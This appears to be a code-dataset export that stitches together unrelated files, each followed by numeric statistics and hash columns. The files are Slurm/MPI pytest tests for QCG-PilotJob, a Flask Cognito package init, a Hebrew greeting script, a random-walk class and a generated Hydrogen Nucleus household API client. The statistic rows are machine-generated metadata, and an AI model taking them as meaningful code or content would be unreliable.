                stdout = 'hostname.out',
                stderr = 'hostname.err',
                modules = [ 'mpi/openmpi-x86_64' ]
            ),
            JobResources(numNodes=ResourceSize(nodes_num))
        )
    ] ]
    # 'finishAfterAllTasksDone' makes the service exit once the job completes.
    reqs = [ { 'request': 'submit', 'jobs': jobs },
             { 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
    save_reqs_to_file(reqs, file_path)
    print('jobs saved to file_path: {}'.format(str(file_path)))

    # The service parses its configuration from sys.argv (file mode, json report).
    sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
                 '--report-format', 'json']
    QCGPMService().start()

    jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
    assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
                stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))

    job_nodes = []
    allocated_cores = 0
    for jname, jentry in jobEntries.items():
        assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))

        # Allocation entries look like 'nodename[core:core:...]' joined by ','.
        jalloc = jentry['runtime']['allocation']
        for jalloc_node in jalloc.split(','):
            node_name = jalloc_node[:jalloc_node.index('[')]
            job_nodes.append(node_name)
            print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
            assert node_name in resources_node_names, '{} not in nodes ({}'.format(
                node_name, ','.join(resources_node_names))

            # Cores are the ':'-separated ids inside the brackets.
            ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
            allocated_cores += ncores
    assert len(job_nodes) == nodes_num, str(job_nodes)
    # No explicit core request: expect more cores than nodes.
    assert allocated_cores > nodes_num, allocated_cores

    # check if hostname is in stdout in two lines
    with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
        stdout_content = [line.rstrip() for line in stdout_file.readlines()]
    assert len(stdout_content) == allocated_cores, str(stdout_content)
    assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)

    # Querying an unknown job name must raise.
    with pytest.raises(ValueError):
        check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')

    rmtree(tmpdir)
def test_slurmenv_many_nodes_many_cores():
    """Run an MPI 'hostname' job that consumes the whole allocation.

    Requests every node (resources.total_nodes) with as many cores per node
    as the first node has free, then verifies the per-node/per-core
    accounting and the hostname line count in stdout.
    """
    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()
    resources_node_names = set(n.name for n in resources.nodes)

    set_pythonpath_to_qcg_module()
    # Work dir must live on a filesystem shared by all allocation nodes.
    tmpdir = str(tempfile.mkdtemp(dir=SHARED_PATH))
    file_path = join(tmpdir, 'jobs.json')
    print('tmpdir: {}'.format(tmpdir))

    jobName = 'hostname'
    jobwdir_base = 'hostname.sandbox'
    # NOTE(review): assumes every node has the same number of free cores as
    # the first one - the '==' assertion below relies on that.
    cores_num = resources.nodes[0].free
    nodes_num = resources.total_nodes
    jobs = [job.to_dict() for job in [
        Job(jobName,
            JobExecution(
                exec = 'mpirun',
                args = [ '--allow-run-as-root', 'hostname' ],
                wd = abspath(join(tmpdir, jobwdir_base)),
                stdout = 'hostname.out',
                stderr = 'hostname.err',
                modules = [ 'mpi/openmpi-x86_64' ]
            ),
            JobResources(numCores=ResourceSize(cores_num), numNodes=ResourceSize(nodes_num))
        )
    ] ]
    # 'finishAfterAllTasksDone' makes the service exit once the job completes.
    reqs = [ { 'request': 'submit', 'jobs': jobs },
             { 'request': 'control', 'command': 'finishAfterAllTasksDone' } ]
    save_reqs_to_file(reqs, file_path)
    print('jobs saved to file_path: {}'.format(str(file_path)))

    # The service parses its configuration from sys.argv (file mode, json report).
    sys.argv = [ 'QCG-PilotJob', '--log', 'debug', '--file', '--file-path', str(file_path), '--wd', tmpdir,
                 '--report-format', 'json']
    QCGPMService().start()

    jobEntries = check_job_status_in_json([ jobName ], workdir=tmpdir, dest_state='SUCCEED')
    assert all((isdir(abspath(join(tmpdir, jobwdir_base))),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')),
                exists(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.err')),
                stat(join(abspath(join(tmpdir, jobwdir_base)), 'hostname.out')).st_size > 0))

    job_nodes = []
    allocated_cores = 0
    for jname, jentry in jobEntries.items():
        assert all(('runtime' in jentry, 'allocation' in jentry.get('runtime', {})))

        # Allocation entries look like 'nodename[core:core:...]' joined by ','.
        jalloc = jentry['runtime']['allocation']
        for jalloc_node in jalloc.split(','):
            node_name = jalloc_node[:jalloc_node.index('[')]
            job_nodes.append(node_name)
            print('{} in available nodes ({})'.format(node_name, ','.join(resources_node_names)))
            assert node_name in resources_node_names, '{} not in nodes ({}'.format(
                node_name, ','.join(resources_node_names))

            # Cores are the ':'-separated ids inside the brackets.
            ncores = len(jalloc_node[jalloc_node.index('[') + 1:-1].split(':'))
            print('#{} cores on node {}'.format(ncores, node_name))
            allocated_cores += ncores
    assert len(job_nodes) == nodes_num, str(job_nodes)
    assert allocated_cores == nodes_num * cores_num, allocated_cores

    # check if hostname is in stdout in two lines
    with open(abspath(join(tmpdir, join(jobwdir_base, 'hostname.out'))), 'rt') as stdout_file:
        stdout_content = [line.rstrip() for line in stdout_file.readlines()]
    assert len(stdout_content) == nodes_num * cores_num, str(stdout_content)
    assert all(hostname in job_nodes for hostname in stdout_content), str(stdout_content)

    # Querying an unknown job name must raise.
    with pytest.raises(ValueError):
        check_job_status_in_json([jobName + 'xxx'], workdir=tmpdir, dest_state='SUCCEED')

    rmtree(tmpdir)
def test_slurmenv_launcher_agents():
    """Start per-node launcher agents, validate their registration metadata,
    verify a second start raises, then stop the agents and clean up.

    Currently skipped unconditionally (event-loop teardown issue).
    """
    # BUG FIX: the skip reason was written as '...doesn\t...' in a
    # single-quoted string, so '\t' rendered a TAB character instead of the
    # intended apostrophe in "doesn't". Double quotes fix the message.
    pytest.skip("somehow this test doesn't properly close event loop")

    if not in_slurm_allocation() or get_num_slurm_nodes() < 2:
        pytest.skip('test not run in slurm allocation or allocation is smaller than 2 nodes')

    resources, allocation = get_slurm_resources_binded()

    # with tempfile.TemporaryDirectory(dir=SHARED_PATH) as tmpdir:
    set_pythonpath_to_qcg_module()
    tmpdir = tempfile.mkdtemp(dir=SHARED_PATH)
    print('tmpdir: {}'.format(tmpdir))

    try:
        auxdir = join(tmpdir, 'qcg')
        print("aux directory set to: {}".format(auxdir))
        mkdir(auxdir)

        # A previous test may have left a closed loop installed - replace it.
        if asyncio.get_event_loop() and asyncio.get_event_loop().is_closed():
            asyncio.set_event_loop(asyncio.new_event_loop())

        LauncherExecutionJob.start_agents(tmpdir, auxdir, resources.nodes, resources.binding)

        try:
            # One agent per allocation node.
            assert len(LauncherExecutionJob.launcher.agents) == resources.total_nodes

            # there should be only one launcher per node, so check based on 'node' in agent['data']['slurm']
            node_names = set(node.name for node in resources.nodes)
            for agent_name, agent in LauncherExecutionJob.launcher.agents.items():
                print("found agent {}: {}".format(agent_name, str(agent)))
                assert all(('process' in agent, 'data' in agent, 'options' in agent.get('data', {}))), str(agent)
                assert all(('slurm' in agent['data'], 'node' in agent.get('data', {}).get('slurm', {}))), str(agent)
                assert agent['data']['slurm']['node'] in node_names
                assert all(('binding' in agent['data']['options'], agent['data']['options']['binding'] == True)), str(agent)
                # Removing the node guarantees no two agents share a node.
                node_names.remove(agent['data']['slurm']['node'])
            assert len(node_names) == 0

            # launching once more should raise exception
            with pytest.raises(Exception):
                LauncherExecutionJob.start_agents(tmpdir, auxdir, resources.nodes, resources.binding)
        finally:
            # Always stop the agents, even if an assertion above failed.
            asyncio.get_event_loop().run_until_complete(asyncio.ensure_future(LauncherExecutionJob.stop_agents()))
            time.sleep(1)
            asyncio.get_event_loop().close()
    finally:
        rmtree(tmpdir)
| 43.123047
| 124
| 0.633951
| 2,686
| 22,079
| 5.000745
| 0.083023
| 0.032013
| 0.045563
| 0.031269
| 0.85408
| 0.834723
| 0.823705
| 0.823705
| 0.823705
| 0.812835
| 0
| 0.003687
| 0.226052
| 22,079
| 511
| 125
| 43.207436
| 0.782362
| 0.026813
| 0
| 0.800512
| 0
| 0
| 0.167598
| 0.010804
| 0
| 0
| 0
| 0
| 0.099744
| 1
| 0.023018
| false
| 0.002558
| 0.038363
| 0
| 0.061381
| 0.069054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fdbd075820069d64a3ec6846326bd045290fce9
| 208
|
py
|
Python
|
flask_cognito_auth/__init__.py
|
gergnz/flask-cognito-auth
|
9139313c121c065876fb708e6b3300f61f105639
|
[
"MIT"
] | null | null | null |
flask_cognito_auth/__init__.py
|
gergnz/flask-cognito-auth
|
9139313c121c065876fb708e6b3300f61f105639
|
[
"MIT"
] | null | null | null |
flask_cognito_auth/__init__.py
|
gergnz/flask-cognito-auth
|
9139313c121c065876fb708e6b3300f61f105639
|
[
"MIT"
] | null | null | null |
from .cognito_auth_manager import CognitoAuthManager
from .decorators import login_handler
from .decorators import logout_handler
from .decorators import callback_handler
from .decorators import is_logged_in
| 34.666667
| 52
| 0.879808
| 27
| 208
| 6.518519
| 0.518519
| 0.318182
| 0.454545
| 0.460227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 208
| 5
| 53
| 41.6
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4ff64972eb98a3bdfd7e61796c1675f23eed7f16
| 254
|
py
|
Python
|
Python/BasicTutorials/kids.py
|
ronkitay/Rons-Tutorials
|
c0459c57cc24b546847ec24afa94d2c1e5373bd4
|
[
"MIT"
] | null | null | null |
Python/BasicTutorials/kids.py
|
ronkitay/Rons-Tutorials
|
c0459c57cc24b546847ec24afa94d2c1e5373bd4
|
[
"MIT"
] | null | null | null |
Python/BasicTutorials/kids.py
|
ronkitay/Rons-Tutorials
|
c0459c57cc24b546847ec24afa94d2c1e5373bd4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Python 2 script (raw_input / print statement). Asks the child's name in
# Hebrew and prints a greeting. The \uXXXX escapes are Hebrew letters with
# niqqud (vowel points); the prompt reads roughly "What is your name?".
child_name = raw_input(u'\u05DE\u05B7\u05D4 \u05E9\u05B0\u05DE\u05B5\u05DA?\n')
# Greeting (roughly "I love you"); the trailing comma keeps it on the same
# output line as the name that follows (Python 2 print statement semantics).
print u'\u05D0\u05B8\u05E0\u05B4\u05D9 \u05D0\u05D5\u05B9\u05D4\u05B5\u05D1 \u05D0\u05D5\u05B9\u05EA\u05B8\u05DA',
print child_name
| 42.333333
| 114
| 0.744094
| 42
| 254
| 4.428571
| 0.690476
| 0.096774
| 0.16129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.298319
| 0.062992
| 254
| 6
| 115
| 42.333333
| 0.483193
| 0.149606
| 0
| 0
| 0
| 0.333333
| 0.725581
| 0.627907
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
8b2c13100267adfe8d861824a38bf5ad0a2b19e2
| 690
|
py
|
Python
|
Clases/ProgDinamicaEstocastica/caminoAleatorio/borracho.py
|
juanpanu/Juan_DS_Path
|
24e71616dae692e931e95cd3815ca88fa9b8a46a
|
[
"MIT"
] | null | null | null |
Clases/ProgDinamicaEstocastica/caminoAleatorio/borracho.py
|
juanpanu/Juan_DS_Path
|
24e71616dae692e931e95cd3815ca88fa9b8a46a
|
[
"MIT"
] | null | null | null |
Clases/ProgDinamicaEstocastica/caminoAleatorio/borracho.py
|
juanpanu/Juan_DS_Path
|
24e71616dae692e931e95cd3815ca88fa9b8a46a
|
[
"MIT"
] | null | null | null |
import random
class Borracho:
def __init__(self,nombre):
self.nombre = nombre
class BorrachoTradicional(Borracho):
def __init__(self, nombre):
super().__init__(nombre)
def camina(self):
return random.choice([(0,1),(0,-1),(1,0), (-1,0)])
class Drogado(Borracho):
def __init__(self, nombre):
super().__init__(nombre)
def camina(self):
return (
random.choice([
(random.random(), random.random() * -1),
(random.random() * -1, random.random()),
(random.random() * -1, random.random() * -1),
(random.random(), random.random()),
])
)
| 23.793103
| 61
| 0.527536
| 71
| 690
| 4.84507
| 0.225352
| 0.383721
| 0.313953
| 0.22093
| 0.776163
| 0.703488
| 0.703488
| 0.703488
| 0.703488
| 0.703488
| 0
| 0.025105
| 0.307246
| 690
| 29
| 62
| 23.793103
| 0.694561
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.238095
| false
| 0
| 0.047619
| 0.095238
| 0.52381
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
8b402cb9141badbb0c472a59509d6dbf06a23f75
| 39,086
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/household_api.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
atom/nucleus/python/nucleus_api/api/household_api.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
atom/nucleus/python/nucleus_api/api/household_api.py
|
ShekharPaatni/SDK
|
6534ffdb63af87c02c431df9add05a90370183cb
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Nucleus API
The Hydrogen Nucleus API # noqa: E501
OpenAPI spec version: 1.9.4
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class HouseholdApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_household_using_post(self, household, **kwargs): # noqa: E501
"""Create a Household # noqa: E501
Create a new household, with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_household_using_post(household, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Household household: household (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_household_using_post_with_http_info(household, **kwargs) # noqa: E501
else:
(data) = self.create_household_using_post_with_http_info(household, **kwargs) # noqa: E501
return data
def create_household_using_post_with_http_info(self, household, **kwargs): # noqa: E501
"""Create a Household # noqa: E501
Create a new household, with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_household_using_post_with_http_info(household, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Household household: household (required)
:return: Household
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_household_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household' is set
if self.api_client.client_side_validation and ('household' not in params or
params['household'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household` when calling `create_household_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'household' in params:
body_params = params['household']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Household', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_household_using_delete(self, household_id, **kwargs): # noqa: E501
"""Delete a Household # noqa: E501
Permanently delete a household # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_household_using_delete(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_household_using_delete_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.delete_household_using_delete_with_http_info(household_id, **kwargs) # noqa: E501
return data
def delete_household_using_delete_with_http_info(self, household_id, **kwargs): # noqa: E501
"""Delete a Household # noqa: E501
Permanently delete a household # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_household_using_delete_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_household_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `delete_household_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_all_using_get(self, **kwargs): # noqa: E501
"""List all household # noqa: E501
Get details for all Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageHousehold
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_household_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_household_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all household # noqa: E501
Get details for all Household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageHousehold
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageHousehold', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_client_asset_size_using_get(self, household_id, **kwargs): # noqa: E501
"""List all household client asset sizes # noqa: E501
Get a list of asset sizes per date for a client's household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_asset_size_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in ()
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_client_asset_size_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_client_asset_size_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_client_asset_size_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""List all household client asset sizes # noqa: E501
Get a list of asset sizes per date for a client's household. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_asset_size_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param str currency_conversion: USD
:param date end_date: end date
:param bool exclude_subledger: true or false
:param bool get_latest: true or false
:param str sort_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in ()
:param date start_date: start date
:return: list[AvailableDateDoubleVO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id', 'currency_conversion', 'end_date', 'exclude_subledger', 'get_latest', 'sort_type', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_client_asset_size_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_client_asset_size_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'exclude_subledger' in params:
query_params.append(('exclude_subledger', params['exclude_subledger'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'sort_type' in params:
query_params.append(('sort_type', params['sort_type'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}/asset_size', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[AvailableDateDoubleVO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_household_client_holding_using_get(self, household_id, **kwargs): # noqa: E501
"""List all household's clientIds holdings # noqa: E501
Get the information for all the securities that are currently being held by a household's client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_holding_using_get(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date - yyyy-mm-dd
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date - yyyy-mm-dd
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_household_client_holding_using_get_with_http_info(household_id, **kwargs) # noqa: E501
else:
(data) = self.get_household_client_holding_using_get_with_http_info(household_id, **kwargs) # noqa: E501
return data
def get_household_client_holding_using_get_with_http_info(self, household_id, **kwargs): # noqa: E501
"""List all household's clientIds holdings # noqa: E501
Get the information for all the securities that are currently being held by a household's client ids registered with your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_household_client_holding_using_get_with_http_info(household_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str household_id: UUID household_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date - yyyy-mm-dd
:param str filter: filter
:param bool get_latest: true or false
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date - yyyy-mm-dd
:return: PagePortfolioHoldingAgg
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['household_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'get_latest', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_household_client_holding_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'household_id' is set
if self.api_client.client_side_validation and ('household_id' not in params or
params['household_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `household_id` when calling `get_household_client_holding_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'household_id' in params:
path_params['household_id'] = params['household_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'get_latest' in params:
query_params.append(('get_latest', params['get_latest'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/household/{household_id}/holding', 'GET',
path_params,
query_params,
header_params,
body=body_params,
